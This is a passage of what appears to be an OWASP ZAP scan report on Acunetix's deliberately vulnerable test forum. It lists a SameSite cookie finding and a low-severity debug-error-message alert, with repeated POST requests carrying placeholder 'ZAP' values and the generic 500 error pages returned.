href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 2 |
Solution |
Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
|
Reference | https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site |
Tags |
OWASP_2021_A01
WSTG-v42-SESS-02 OWASP_2017_A05 |
CWE Id | 1275 |
WASC Id | 13 |
Plugin Id | 10054 |
Low |
Information Disclosure - Debug Error Messages |
---|---|
Description |
The response appeared to contain common error messages returned by platforms such as ASP.NET, and Web-servers such as IIS and Apache. You can configure the list of common debug messages.
|
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 453 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 481 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
